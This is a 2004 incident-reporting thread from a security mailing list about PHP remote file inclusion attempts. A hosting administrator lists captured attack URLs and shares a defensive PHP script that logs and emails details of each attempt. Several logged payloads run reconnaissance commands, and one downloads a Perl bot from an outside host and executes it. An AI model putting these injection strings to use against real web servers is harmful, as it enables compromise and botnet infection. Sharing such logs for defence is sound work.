Security Incidents mailing list archives
RE: PHP injection attempt from 200.222.244.154
From: "KEM Hosting" <security () kemhosting com>
Date: Tue, 23 Nov 2004 09:48:54 -0600
I have received so many of these style attacks that I modified my index pages and wrote a script to handle the attempts (see below). It automatically redirects the hacker/user to the script if the URL query string contains "://". Most recent attempts: 200.221.255.182 via: http://www.spykidsgroup.net/spy.gif?&cmd=cd%20/tmp;wget%20www.spykidsgroup.n et/bot.perl;perl%20bot.perl 213.228.82.91 via: http://faq111.narod.ru/1&cmd=uname%20-a 200.221.222.55 via: http://hc.ircdrinks.net/cmd.gif?&cmd=uname%20-a 200.228.78.30 via: http://dd0s.0catch.com/cse.gif?&cmd=id 200.222.227.38 via: http://members.lycos.co.uk/mastadog/readme.txt?&cmd=id;uptime;uname%20-a;w;w get;curl 200.221.223.131 via: http://www.spykidsgroup.net/spy.gif?&shell=write 203.130.228.74 via: http://geocities.com/k4but/suntik.txt?&cmd=id 201.8.100.232 via: http://www.irs-online.it/guns/spy.gif?&cmd=locate%20config.inc.php Pretty much all the scripts are the same code base, just slightly modified. ============= Hack Handler ============= <?PHP function getIP() { $tmparr = array(); $tmparr[] = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmparr += explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']); } return $tmparr; } $ip = getIP(); foreach($ip as $i){ $content .= "$i\n"; } $content .= print_r($_SERVER, true); //add everything else for posterity $headers = "MIME-Version: 1.0\r\n"; $headers .= "From: Alert <security () domain com>\r\n"; $headers .= "Reply-to: security <security () domain com>\r\n"; $headers .= "X-Priority: 3\r\n"; $headers .= "X-Mailer: PHP mailer\r\n"; mail("alert () domain com", "URL Hack Attempt", $content, $headers, "-f security () domain com"); //now, log the hack to the system log define_syslog_variables(); openlog("PHPLog", LOG_PID | LOG_PERROR, LOG_LOCAL0); $access = date("Y/m/d H:i:s"); $ip = implode(",", $ip); syslog(LOG_WARNING, "Hack Attempt: $access $ip $_SERVER[REQUEST_URI])"); closelog(); echo "You're not playing nicely.<BR>Your IP has been logged and the admin has been notified."; ?> -----Original Message----- From: Kirby Angell [mailto:kangell () alertra com] Sent: Saturday, November 20, 2004 3:23 PM To: Incidents List Subject: PHP injection attempt from 200.222.244.154 SOA: 20041120 14:34 CST EOA: 20041120 14:34 CST ATTACK-IP: 200.222.244.154/Linux/Brazil (A1) TARGET-IP: 204.249.195.250 (V1) Summary This attack was an attempt to get a malcious PHP script run on the victim through a common PHP coding error. The web server's page in this case was not susceptible to the attack and a 302 Not Found error was returned. ... In the first attempt, the attacker tried: http://uptime.alertra.com/uptime3?pin=http://geocities.yahoo.com.br/packx1/c s.jpg?&cmd=uname%20-a The rest of the attempts the attacker tried: http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx 1/cs.jpg?&cmd=uname%20-a .....
Current thread:
- PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 22)
- RE: PHP injection attempt from 200.222.244.154 KEM Hosting (Nov 23)
- Re: PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 24)